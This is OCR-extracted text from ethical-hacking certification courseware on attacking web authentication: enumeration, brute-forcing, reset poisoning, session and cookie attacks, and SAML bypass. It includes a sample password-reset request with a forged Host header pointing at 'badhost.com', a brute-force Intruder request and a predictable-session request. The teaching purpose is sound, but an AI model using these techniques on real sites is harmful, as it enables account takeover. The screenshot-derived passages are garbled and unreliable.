Forri,,tfdoell,S
_.._ ,. , 1111 s ,- , 1111 1 PnmaryPrllllf'localnoatlOIO C1N1111.Scan1 • 0 • o <a>o t oe o tato /"O ~ o

https://www.zoproxy.org
COpynght Cl by EC-C1uncil All Rights Reserved Reproduction IS Strictly Prohibited

Module 14 Page 2032 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Bypass Authentication: Bypass SAML-based SSO

-.. • • h , "> 't I.. 1 ' ' , • ,, • • : l...: • 1 ' , ' , • 1 l'
Single Sign-on (SSO) aut hentication
Burp Proj.c:t lntl\lCMr Repe:•t.,- Window H.lp
processes permit a user t o sign int o
an application using a single set of Extend<, ProjKt options Us.er options
Dashboard Targft
credentials and use the same login
session to access multiple J J HTTP hi,to,y
applications irrespective of domains
or platforms
~----....
~~
[ WebSo<ket> hi,to,y [ opt;ons ]

---- ~ t!!l l!J

Th e co mmunication between these nn.... nn, •1n"1t

1ti.....n,u .. »n11:

applicat ions ca n be done th rough

SAM L messages L!J · , - ........ ,, .........- 1

SAM L messages are encrypted using

I ==~ ~, . . . . - 1

Base64 encoding and can be easily

decry pted to extract th e content of
messa ges
Att ackers use tools such as SAM L
Raider to bypass SAM-based SSO
~-~'•;,':!".,;::,::::·~
.., .,,:• .,, ..1...
..,.,s....,,.,...
~-
I
~ :MJt<t"
,...-\,-10, ........,.. ,_,.,_,,-c:-..::t.o,_,,. f_,,,.,., ...,.,..............,..,nn1ty.c-.ta.....,11.c-.iH•\:-u.,,i
II,\ ...-'.! M JKtC.,,11,. .uon ,_ ••...-t1: - l t t - 1 t c 15"".:;l,0: co; . . .t ot•.,
11 _ \ ,. .Jt<U:. .t1,-n...O.t•
11 ; so• •. -U ?'a.led:iett6'0Mff~
II
I
. . t(• · ••••·••30llOl 251' 11:•:!IS.701Z-
<t.-\,SIJ>Jt<tC-11,.,.u_
t11te,,,_,, •...,ttpe:/ 1...-.•••...., . •,..., ....lo U1.-, - . z.---r •1.,
I ~, -1.:UJt<l"
: ~~:=.,.::!,.~,;;:~1•01 251 11 :•l: 25. 701Z- ,_, AIU• •'3019- 0l· 251'11;-:9. '1'01Z- .,.

aut hentication I
I. .._,.......t,-.-o>ohtt1>9:f,_..,,.,,,.,..,ty
_t,..,,.,__,nct,..,~ ....f.t,,W..\etl,.,1...... ,_,..,..~
•

https://portswigger.net

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Attack Authentication Mechanism

In general, web applications authenticate users through authentication mechanisms such as
login functionality. During web application analysis, attackers try to find authentication
vulnerabilities such as weak passwords (e.g., short or blank, common dictionary words or
names, user's names, defaults). Attackers exploit these vulnerabilities to gain access to the web
application by network eavesdropping, brute-force attacks, dictionary attacks, cookie replay
attacks, credential theft, etc.
Most authentication mechanisms used by web applications have design flaws. Attackers can
identify these flaws and exploit them to gain unauthorized access to the web appl ication . Such
design flaws include failure to check password strength, insecure transmission of credential s
over the Internet, etc. Web applications usually authenticate their clients or users by a
combination of a username and password, which can be identified and exploited.
■ Username Enumeration

Attackers can enumerate usernames in two ways: verbose failure messages and
predictable usernames.

o Verbose Failure Message

In a typical login system, the user enters two fields, namely username and password .
In some cases, an application will ask for additional information. If the user is trying
to log in and fails, it implies that at least one field was incorrect. This provides
grounds for an attacker to exploit the application.
Examples:

• Account <username> not found

Module 14 Page 2033 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

• Incorrect password provided

• Account <username> has been locked out
o Predictable Usernames

Some applications automatically generate account usernames according to some

predictable sequence. This makes it very easy for the attacker to discern the
sequence for a potentially exhaustive list of all valid usernames.
■ Password Attacks

A password attack is a process of trying various password cracking techniques to

discover a user account password by which the attacker can gain access to an
application.
Methods for cracking passwords include the following:
o Password functionality exploits
o Password guessing
o Brute-force attack
o Dictionary attack
o Attack password reset mechanism
■ Session Attacks

The following types of session attacks are employed by attackers against authentication
mechanisms:
o Session prediction: It focuses on predicting session ID values that allow the attacker
to bypass the authentication mechanism of an application. By analyzing and
understanding the session ID generation process, the attacker can predict a valid
session ID value and gain access to the application .
o Session brute-forcing: An attacker brute-forces the session ID of a target user and
uses it to log in as a legitimate user and gain access to the application .
o Session poisoning: It allows an attacker to inject malicious content, modify the
user's online experience, and obtain unauthorized information.
■ Cookie Exploitation

Cookie exploitation attacks are of the following types:

o Cookie poisoning: It is a type of parameter tampering attack in which the attacker
modifies the cookie contents to draw unauthorized information about a user and
thus perform identity theft.
o Cookie sniffing: It is a technique in which an attacker sniffs a cookie containing the
session ID of the victim who has logged in to a target website and uses the cookie to
bypass the authentication process and log in to the victim's account.

Module 14 Page 2034 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Cookie replay: It is a technique used to impersonate a legitimate user by replaying

the session/cookie that contains the session ID of that user (as long as he/she
remains logged in). This attack stops working once the user logs out of the session.
■ Bypass Authentication

o Bypass SAML-based SSO: Attackers take advantage of signature misconfigurations,

session expiry timeouts, session replays, misdirected SAML messages, etc., to bypass
SAML-based SSO authentication.
Design Flaws in Authentication Mechanism

Authentication mechanisms are more vulnerable to attacks than other implementations

involved in web application security. Applications usually validate a user via his/her login
credentials; even a minor weakness in this authentication process can lead to serious
consequences such as granting access to illegitimate users.
■ Bad Passwords: Any application is designed to have minimum control over checking and
validating the user credentials. Users often come across applications that accept
passwords such as blank or short values, ordinary names, dictionary words, the same
password as the username, and default parameters. Such passwords can be easily
guessed by the attackers, allowing them to access the application resources.
■ Brute-Forcible Login: The login feature of an application allows an attacker to predict
user credentials, through which the attacker can enter the application illegitimately. If
the application permits numerous login attempts without any restrictions, such as
blocking an account after a certain number of attempts, attackers can continue to try
different passwords until they find the right one. Thus, even an unprofessional hacker
can log in by manually entering different password combinations.
■ Verbose Failure Messages: Any login form of an application requests users to feed at
least two fields, namely username and password. A few applications may also ask for
additional parameters such as DOB, answer to a security question, and OTP pin, to
validate a user. If the login attempt is unsuccessful, the application indicates that the
information provided is not valid . When the application specifies which field is incorrect
or pops up reasons for denying access, attackers can easily exploit that field by trying a
large set of similar names or words to enumerate valid data required to access the
application. The list of enumerated data can also be used later for social engineering.
■ Insecure Transmission of Credentials: If an application makes an insecure HTTP
connection to pass sensitive information, it becomes susceptible to MITM attacks,
through which attackers can eavesdrop on and impede data transmission. Even though
the HTTPS connection is made, attackers can still steal the credentials if the application
handles credentials in an insecure manner such as passing information as query string
parameters, and storing credentials in cookies.
■ Password Reset Mechanism: In most applications, the password reset mechanism is
mandatory and applied periodically to reduce the threat of compromised passwords.
Moreover, when users notice misuse of their credentials, they can change their

Module 14 Page 2035 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

passwords immediately to prevent illegitimate use. Sometimes, this password reset

feature can also be exploited. Vulnerabilities that are ignored in the main login function
can appear again in the password reset mechanism. Some of the flaws in the password
reset mechanism are as follows:
o Generating the verbose error, specifying if the username is valid
o Enabling guessing of "Existing password" field without any restrictions
o Checking if "New Password" and "Confirm Password" fields comprise the same
values only after authenticating the existing password, thereby permitting an attack
to be successful in identifying the existing password explicitly
■ Forgotten Password Mechanism: As with the password change mechanism, methods
for recovering forgotten passwords often entail issues that are commonly ignored in the
main login function, such as enumerating usernames. Additionally, several design flaws
in the forgotten password mechanism often make it more vulnerable, through which
the overall authentication logic of an application is targeted. Some of the flaws in the
forgotten password mechanism are as follows:
o Providing a secondary challenge when a user forgets a password
o Developers often ignore the chances of the application being brute-forced during
the password recovery process. If the application allows any number of attempts to
recover the password, it is highly likely that the password will be recovered by
guessing random answers related to the user
■ "Remember Me" Functionality: Applications also provide the "Remember Me" function
for convenience to avoid reentry of the username and password when a user tries to
sign into an application from his/her device repeatedly. This mechanism is often
vulnerable because the user can be attacked from both a local computer and users on
other machines. "Remember Me" functions are enforced with some persistent cookies.
When these cookies are initiated, the application trusts them as they were already
stored in the earlier session and generates a new session without asking for the login
credentials again . Attackers can try a list of ordinary words or enumerated usernames to
gain complete access to the application without being validated.
■ User Impersonation: Some privileged users access applications using other user
credentials to assist the original users in performing their operations. For instance, if the
Internet connection is broken, the user contacts the service provider to seek advice.
Then, the customer care executive logins with the user data in his or her system and
assists the user in resolving the service outage. If an application allows privileged users
to impersonate others, any flaws in the impersonating logic can lead to vertical privilege
escalation, though which an attacker can gain complete access to the application .
■ Improper Validation of Credentials: Applications are designed with proper
authentication mechanisms such as accepting passwords with a minimum length and
allowing case-sensitive (upper and lower case), numeric, and special characters. By
contrast, a poorly designed application's authentication mechanisms not only ignore

Module 14 Page 2036 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

good security implementations but also fail to consider the user's attempts to apply
strong password characters.
For instance, some applications shorten the password and evaluate only the first few
characters. A few applications check for case-insensitive passwords and others perform
unusual character stripping before password checks. Attackers can perform automated-
password guessing attacks on such applications to remove the unwanted test cases and
shorten the number of requests required to compromise an account.
• Predictable Usernames and Passwords: A few applications produce usernames
automatically based on a predictable sequence. Attackers exploit this characteristic of
an application and instantly acquire the valid list of usernames, through which they can
perform further attacks.
Sometimes, the user list is created all at once or in the form of groups, and all these
users' initial passwords are distributed via some sources. The sources for creating
passwords can allow the attacker to guess the passwords of the users. Such
vulnerabilities are often triggered within an intranet environment.
■ Insecure Distribution of Credentials: Most applications adopt a procedure in which the
login credentials are supplied via SMS, email, post, etc. In some cases, what is supplied
to users may include not only login credentials but also a URL consisting of an
"activation code" to change the system-generated or initially generated passwords. If a
bunch of such URLs are sent to the same users, attackers can discover this activity by
enrolling multiple user accounts and deduce the activation codes sent via URLs to the
newly enrolled and yet-to-be enrolled users.
Implementation Flaws in Authentication Mechanism

Sometimes, carefully designed application security mechanisms open gateways to attacks due
to some mistakes in their enforcement. These mistakes may lead to information leakage,
bypassing of login security, or diminishing of the entire security module. Implementation flaws
in authentication are more dangerous as they cannot be discovered with normal testing
methods. Some of the implementation flaws in authentication mechanisms are as follows :
■ Fail-Open Login Mechanism: It is a logic defect that leads to significant consequences in
the authentication process. For instance, invoking db.getUser() can trigger some
exceptions, such as a null pointer exception, as the requested function has no username
or password credential s but it can still log in. This session may be dependent on a
specific user identity; hence, even when it is not fully functional, it can still allow
attackers to access critical information or functionality.
Example,
Public Response verifyLogin(Session mySession) {
try {
String username = mySession.getParameter ("username" ) ;
S tring password= mySession.getParameter ("password" ) ;
User thisUser = db.getUser (username , password) ;

Module 14 Page 2037 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

if (thisUser == null) {
//invalid credentials
mySession.setMessage ("Login Failed.");
return doLogin(mySession);

catch (Exception e) {}
//valid user
mySession.setMessage ("Login successful!");
return doMainMenu(mySession);
}

• Flaws in Multistage Login Functionality: Multistage login functionality is an advanced

security mechanism for username-and-password-based login models. This login method
is performed in three stages: username and password entry, a challenge for certain
input digits or memorable characters, and value submissions disclosed on changing a
physical token. The first stage involves users validating themselves with their username
or other valid input, and the remaining stages carry out different validation checks. Such
validations often come with different vulnerabilities known as logic defects.
• Insecure Storage of Credentials: Although an application may have no inherent flaws, it
can make itself vulnerable by storing login credentials in an insecure way. In general,
applications store user credentials in a database in an unencrypted form. Some
applications use weak encryption algorithms to encrypt and store credentials.
Vulnerabilities in such implementations allow attackers to perform brute-force and
password cracking attacks.
Username Enumeration

Source: https;//wordpress.com
If a login error states which of the username or password is incorrect, that field can be guessed
using the trial-and-error method.
Consider the following example. An attacker tries to enumerate the username and password of
"Rini Matthews" on wordpress.com . In the first attempt, the attacker tries to login as
"rini.matthews," which results in the login failure message "invalid email or username."

Module 14 Page 2038 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

@WordPress.com

Log in to your account

Email Address or Username

I rini.matthews
(D User does not exist. Would you like to create a
new account?

By continuing you agree to our Terms of Service.

Continue

Figure 14.65: Error message for username does not exist

In the second attempt, the attacker tries to login as "rinimatthews," which results in a message
stating that the password entered for the username is incorrect, thus confirming that the
username "rinimatthews" exists.

@wordPress.com

Log in to you r account

~ Change Username

111 I IOlll 1cvv:,

Password

I ...... 1

(D Oops, t hat's not the right password. Please try

again!

By continuing you agree to our Terms of Service.

Log In

Figure 14.66: Error message for username successfully enumerated to rinimatthews

Note: Username enumeration from verbose error messages will fail if the application has an
account lockout policy, whereby the account is automatically locked after a certain number of
failed login attempts.

Module 14 Page 2039 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Some applications automatically generate account usernames based on a sequence (e.g.,

"user101," "user102"). Therefore, attackers can perform username enumeration by
determining the appropriate sequence.
Attackers can also use tools such as massh-enum (https://github.com) to perform automated
user enumeration on the target web application.
Password Attacks: Password Functionality Exploits
■ Password Changing: Determine the password change functionality within the
application by spidering the application or creating a login account. Try random strings
for the "Old Password", "New Password", and "Confirm the New Password" fields and
analyze errors to identify vulnerabilities in the password change functionality.
■ Password Recovery: "Forgot Password" features generally present a challenge to the
user; if the number of attempts is not limited, an attacker can guess the answer and
solve the challenge successfully with the help of social engineering. Applications may
also send a unique recovery URL or existing password to an email address specified by
the attacker if the challenge is solved .
■ 'Remember Me' Exploit: "Remember Me" functions are implemented using a simple
persistent cookie such as RememberUser=jason or a persistent session identifier such as
RememberUser=ABY112010. Attackers can use an enumerated username or predict the
session identifier to bypass authentication mechanisms.
Password Attacks: Password Guessing
As its name implies, password guessing is the process of guessing possible user keywords that
might constitute an account password until eventually arriving at the correct one. To guess
passwords, attackers use techniques such as password lists and password dictionaries.
■ Password List
The majority of keywords used for preparing the password list includes certain daily
usage words such as birth date, street name, nickname, anniversary date, phone
number, pin number, parent's or friend's name, and pet's name.
Create a list of possible passwords using the most commonly used passwords as well as
footprinting and social engineering techniques, and try each password until the correct
password is discovered.
■ Password Dictionary
A password dictionary is the compilation of word and number combinations that could
be passwords. This type of attack saves time compared to a brute force attack.
Create a dictionary of all possible passwords using tools such as Dictionary Maker to
perform dictionary attacks.
■ Tools
Password guessing can be performed manually or using automated tools such as THC-
Hydra, Burp Suite, L0phtCrack, ophcrack, and RainbowCrack.

Module 14 Page 2040 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o THC-Hydra

Source: https://www.the.org
THC-Hydra is a network logon cracker that supports many different services, such as
1Pv6 and Internationalized RFC 4013. It comes with a GUI and supports HTTP proxy
and SOCKS proxy. Furthermore, it uses various authentication methods for services,
including Firebird, FTP, IMAP, LDAP, MS-SQL, RDP, SMTP, SNMP, and Telnet.

Figure 14.67: Screenshot of THC-Hydra

Password Attacks: Brute-forcing

Brute-forcing is another method used for cracking passwords. Guessing becomes crucial when
the password is long or contains letters in upper and lower cases. If numbers and symbols are
used, it could take several years to guess the password, which is impractical.
Try to crack the password by trying all possible values from a set of alphabetical, numerical, and
special characters. Use password cracking tools such as Burp Suite to crack the password.
Password Cracking Tools

Some brute-forcing tools for cracking passwords are described below.

• Burp Suite

Source: https://portswigger.net
Burp Suite is an integrated platform for performing security testing of web applications.
It has various tools that work together to support the entire testing process, from initial
mapping and analysis of an application's attack surface to finding and exploiting security
vulnerabilities.
Burp Suite built-in tools

o Intercepting proxy for inspecting and modifying traffic between your browser and
the target application
o Application-aware spider for crawling content and functionality

o Web application scanner for automating the detection of numerous types of

vulnerabilities

Module 14 Page 2041 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Intruder tool for performing customized attacks to find and exploit unusual
vulnerabilities
o Repeater tool for manipulating and resending individual requests

o Sequencer tool for testing the randomness of session tokens

i) A._._ <-d. l ,-. r -. 1 ~ , ...,.\_ , ~) >_ (j~ . 1

__ .. ~ □ T1 1 ~-- • ~1 11 ::;s

c. • • • , · , ·,· · .I" r, , ., .
Burp Project Intruder Repeater Window Help
Dashboard Target lntrudrr Repeater ~quencer Decodt,r Comparer Logger Exte~r Project options U~roptiom; Learn
l X 2 X

Target Positions Payloads Resource Pool Options

Q) Payload PMilions M1i,IJ:iflW

Configure the positions where payloads will be inserted Into the base request. The attack type determines the way in which payloads are assigned to payload positions - see help for full
drtails.

A.ttacktyp1e: Sniper

l POST /CEH/'wp-login, php HTTP/1. l Add!

2 Host : 10. 10.1.22:8080
3 Use r -Agent: Mozill11/ S.0 (Wi ndo,.,s NT 10,0; rv:7B,C ) Gecko/201<)0101 Firefox / 78.0
4 Accept: text / ht11l, application/ xht •t +Hl, app1ication /ul ; q•O. 9, 1.nage/ 'webp , f./ +; q- o. 8
~~
5 Accept - Lnngua9e: en-US,en ; q.o,0.5 1 ..,.i 1
6
7
Acce pt-Encoding: 9zi p , deflate
~ferer : http://10. 10.1.22:8080/CEH/ vp-login,php7
I Refresh
8 Cont ent -Type; application/x -'w'IN-for■ -urlencoded
9 Cont ent-Length: 115
10 Origin: http: l/ 10. 10.1.22:8080
11 ONT : 1
12 Connection: close
13 Cookie: vo r dpress test cookie• §\\'P'-1-20Coohe••20check§
14 Up9 r ade- I nsecure-RequeSts : 1
15
16 log~ p...tti §passvord§i---'p-subait• §Lo9+InU.redirect_t o-§http%3A!.2Pi2Fl0, 10. 1. 22"-.3A8080',12FCEH'-.2Fvp-adain~.2F§&test cookie
=§l r -

(?)@(B@~s._,_"h- - - - - - - - - - - - - - - - - - - - - - - - - - - ~ Omatches Clu r

6 payload positions length: 675

Figure 14.68: Screenshot of Burp Suite

Some additional password cracking tools are as follows:

■ L0phtCrack (https://IOphtcrack.git/ab.io)
■ ophcrack (https://ophcrack.sourceforge.io)
■ RainbowCrack (https://project-rainbowcrack.com)
■ Windows Password Recovery Tool (https://www.windowspasswordsrecovery.com)
■ Dictionary Maker (http://dictionarymaker.sourceforge.net)
Password Attacks: Attack Password Reset Mechanism

Insecure password management practices lead to critical security vulnerabilities. One such
vulnerability is password reset poisoning that is exploited by the attacker to leverage headers
such as Host in the HTTP request message.
Resetting the password is a common function used by the user when he/she forgets his/her
password and needs to reset it. The user receives a forgot password link via email containing

Module 14 Page 2042 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

the one-time token, and when the link is clicked, the server responds with a password reset
page.
For example, consider the following HTTP request where the attacker uses the Host header to
perform the attack:
GET https://certifiedhacker.com/[email protected]
HTTP/1.1
Host: badhost.com
The following password reset link is sent to the victim:
$resetPwdURL = "https://{$ SERVER['HTTP_HOST']}/reset-
pwdd.php?token=87654321-8765-8765-8765-10987654321";
The abovementioned URL link is injected in a password reset email and sent to the victim. As
the developers expect $_SERVER [ 'HTTP_HOST ' ] to be from certifiedhacker. com,
they fail to perform additional input sanity checks.
The password reset poisoning attack involves the following steps:
■ Step 1: The attacker obtains the target's email address used on the website through
techniques such as social engineering and OSINT.
■ Step 2: The attacker sends a password reset request link to the victim using the altered
Host header. For example,
POST https://certifiedhacker.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: badhost.com
The resultant URL for resetting the password is
https://badhost.com/reset-password.php?token=87654321-8765-
8765-8765-10987654321
■ Step 3: Now, the attacker waits for the victim to receive the modified email.

■ Step 4 : Once the victim clicks on the malicious link embedded in the email, the attacker
extracts the password reset token. Using this token, the attacker performs various
malicious activities such as cloning web applications to steal the user's credentials or
acting as a proxy and mimicking the behavior and contents of the original website.
Session Attacks: Session ID Prediction/Brute-forcing

Every time a user logs in to a particular website, the server assigns a session ID to the user to
keep track of all the activities on the website. This session ID is valid until the user logs out; the
server provides a new session ID when the user logs in again. Attackers try to exploit this
session ID mechanism by guessing the next session ID after collecting some valid ones.

Module 14 Page 2043 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

For certain web applications, the session ID information involves a string of fixed width.
Randomness is essential to avoid prediction.
Session attacks are performed in the following steps:
■ In the first step, collect some valid session ID values by sniffing traffic from
authenticated users.
■ Analyze the captured session IDs to determine the session ID generation process, such
as the structure of the session ID, the information that is used to create it, and the
encryption or hash algorithm used by the application to protect it.
■ Vulnerable session generation mechanisms that use session IDs composed of a
username or other predictable information, such as timestamp or client IP address, can
be exploited by easily guessing valid session IDs.
■ In addition, you can implement a brute-force technique to generate and test different
values of the session ID until you successfully gain access to the application.
From the diagram below, you can see that the session ID variable is indicated by JSESSIONID
and its assumed value is "user01," which corresponds to the username. By guessing its new
value, say, as "user 02," it is possible for the attacker to gain unauthorized access to the
application.
GET http://janalna:8180/WebGoat/attack?Screen-17 & menu=410 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.04
Accept: text/xml, application/xml, appllcation/xhtml+xml,text/htmtl;q-
GET Request
0.9,text/plain;q=0.8,lmage/png, • /* ,q=0.5

Referer: http://janaina: 8180/WebGoat/attack?Screen=17&menu=410

Cookie: JSESSIONID=user0l +. .. . . . ... . . ... . . ... . . ... . . . ... . .. .. . . . ... . . . . Predictable Session Cookie
Authorization: Basic Z3Vic3Q6Z3Vlc3Q

Figure 14.69: Screenshot displaying predictable session cookie

Cookie Exploitation: Cookie Poisoning

Cookies frequently transmit sensitive credentials from the client browser to the server.
Attackers can modify these with ease to gain access to the server or assume the identity of
another user.
Client browsers use cookies to maintain a session state when they employ stateless HTTP
protocol IDs for communication. Servers tie unique sessions to the individual accessing the web
application. Poisoning of cookies and session information can allow an attacker to inject
malicious content or modify the user's online experience and obtain unauthorized information.
Cookies can contain session-specific data such as user IDs, passwords, account numbers, links
to shopping cart contents, supplied private information, and session IDs. They exist as files
stored in the client computer's memory or on its hard disk. By modifying the cookie data, an
attacker can often gain escalated access or maliciously affect the user's session . Many sites
offer the "Remember me?" function and store the user information in a cookie so that the user
does not have to re-enter the data with every visit to the site. Any private information entered
is stored in a cookie. To protect cookies, site developers often encode them. Encoded cookies

Module 14 Page 2044 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is St rictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

give developers a false sense of cookie security, as the encoding process can easily be reversed
with decoding methods such as Base64 and ROT13 (rotating the letters of the alphabet through
13 characters) .
Cookie poisoning is performed in the following steps:
■ If the cookie contains passwords or session identifiers, steal the cookie using techniques
such as script injection and eavesdropping
■ Then, replay the cookie with the same or altered passwords or session identifiers to
bypass web application authentication
■ Trap cookies using tools such as OWASP Zed Attack Proxy, and Burp Suite.
Cookie Exploitation Tools:

■ OWASP Zed Attack Proxy

Source: https;//www.zaproxy.org
OWASP Zed Attack Proxy Project (ZAP) is an integrated penetration testing tool for web
applications. It provides automated scanners as well as a set of tools that allow you to
find security vulnerabilities manually.

Ii) OWA!,J>z» . OWASP ZAP 2,11,1 X

fh .Edit ~9W 111!1
fttpOft Iools !mport Qnhn• fjetp
standard Mode v ~ - o .... j a - I -EJ :J ~ ii:)lg] .. .,
S,es + ~ .., Ouiek Start ➔ Requut ~ Re~ponse +
Ci O iu:'.3 V Boa, Tf.d V ._J
GET http: //WWW."10Yicscopc ,COffl/Virwprof"ilc.ospxHd•l HTTP/1. l
~ Contt>ls
Host: - . .w,vicscope.cOIII
.... Oefaull Conte)l Unr-~1cnt: "°z.lll•/5.e (Windows NT 18.9; wtn64; x64; rv:1ee.e) Gttko/28188181 fir-dox/188.8
Accept: tcd/ht-1 ,oPOl l c etion/xht•l t-JllU. opp) icetion/W ;Q•8. 9. i•.;nc/ ov1 f . ln1ozc/wcbp. • t • ;a--e. 8
P.cccpt· l on1uoe:c: cn·US ,cn;qa8.S
Refer-er: https ://www.1110Vicscope. coaJiMcx.upx
Connection: lcccp·olivc
(ootch: : 1HCe>pe•l jW)'d"tf8wro-
U,:,1rodc·lnsccure-Acqucrts: 1
Scc-Frich-~st : dOCU!'~nt
Scc•Fctch•Hodc: n■vicatc
Sec - fctch·Sitc: se111c·odlin
Scc-Fctch•Uscr : H

• HlSIOf)' Staretl t- Ntrts

•,. e f FIiter Off
Source
f' Exoort
Req_Tlmestamp r.lelnod URL Code Reason RTT Sile Rtsc:i. Body Hgt1estN1r1 Noto Tags
14 ..,. Pr

..
5126122, 6'30·06 Aloi GET h11P:/lwww moYiescope comJls/Jquery minJs 200 OK 61 93.637 bttes flll l.1edlum Hidden, ScnPl C
20 ... PL 5126J22,15.JOOl5Nd GET h~.JIWWW.fflOYlescope.co~qu•ry.sc:npt.jS 200 OK 47- 18,1591 Dt'H .. LOW Comm•nI
21 ... Pr 5126122 6 30 06 Aloi GET hlirlhfww moYiescope com.llsJJQUery quicks 200 OK 15,003 bytes ,- Low Comment
22 . . Pr_ 5126122. 6:30.06.., GET h11PlM'ww.fflO't1escope.COmljs/)QU1ry.ffHSIL. 200 OK 48-. 16.663 Dj1:IS .. LOW Commenl
24 ... Pr 5'2612.2, 153OO7Ald GET hltp.bWww moviHCOPt co~sljqu1ry-ulHI 200 OK 141 17,089 t,ftU ,- Low Comm•nl
27 ..,. Pr 5126122, 6·3008.., GET htf)-J/www.lTIO"MSCOpe.com,sJJquery-u1.seL 200 OK 4 ms 17,089 D;tes .. LOW CommenI
28 ... Pr
29 ..,. Pr
512612Z,15.3134ALI
5126122, 6·31 34 Aloi
POST
GET
hltplNIWw.movttscope.coml
hlP:11-Nww lTIOVIUCOpe comlindex.aspx
302 Found
200 OK
83
69
t28b)'tes
27,083 t,;,es .......
.. LOW SilCOOtlt
Fom,. Hidden. S
!57 ... PL.
58 ~ Pr
~ 1 5.3139AM
S'2612:2&3139Ald
POST
GET
hto:V#WW.movttSCOPt.COmllOOtx.aspx
htt,:i Uwww moviescope comMe'NS)folle asp
Nt rts fllll 1 fllll 5 ,- 15 11111 1 Prtma,y Proxy; localhost808O
302 FOt.rld
200 OK
7ms 139b)1H
•• 24 298 t,ftes
Current Scans eo
.......
l" Low

. . O <I> O 0
Form Hidden. s
e o :jlto o tlj: o

Figure 14.70: Screenshot of OWASP ZAP

Some additional cookie exploitation tools are as follows:

■ L0phtCrack (https://IOphtcrack.gitlab.io)
■ Burp Suite (https://www.portswigger.net)

Module 14 Page 2045 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ XSSer (https://xsser.03c8.net)
Bypass Authentication: Bypass SAML-based SSO

The single sign-on (550) authentication process permits a user to sign in to an application using
a single set of credentials, and the same login session can be used to access multiple
applications irrespective of the domain or platform. For instance, when a user logs in using
his/her Google account on a desktop or mobile device, he/she is automatically authenticated
for other services such as Google Drive, YouTube, and Gmail. This authentication mechanism
inside different applications is performed using the SAML protocol.
Security Assertion Markup Language (SAML) is an XML-based infrastructure that serves as an
authorization and authentication medium between two peers, such as identity provider (ldP)
and service provider (SP). The service provider entrusts the identity provider with validating
users. Then, the identity provider responds with an SAML assertion (confirmation message)
after validating any user.

Trust Relationship l
User Browser ~ .......................:

Service Provider

Figure 14.71: Illustration of SAML based 550

Traditional applications can perform the authentication process before providing protected
function access to the user. With the evolution of the 550 infrastructure, this authentication
process has been handed over to third-party identity provider applications to access functions
from the service provider application. Communication between these applications can be
established through SAML messages.
These SAML messages are encrypted using Base64 encoding. Attackers can easily decrypt these
messages and read the content of the messages. Two major fields in SAML messages, signature
and assertion, are susceptible to midway tampering. Signature is used to build a trust
relationship between the SP and the ldP, and assertion is used to direct the SP on providing
application services to the valid users.
Attackers can take advantage of signature misconfigurations, session expiry timeouts, session
replays, misdirected SAML messages, etc., to bypass SAML-based 550 authentication and insert
their own messages. Attackers use tools such as SAML Raider to bypass SAM-based 550
authentication. SAML Raider is a Burp Suite extension used for SAML infrastructure testing. It
can be used to perform two core operations: modifying SAML messages and managing X.509
certificates.

Module 14 Page 2046 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Using SAML Raider

• Configure the browser to proceed with Burp Suite. Open Burp Suite with the new
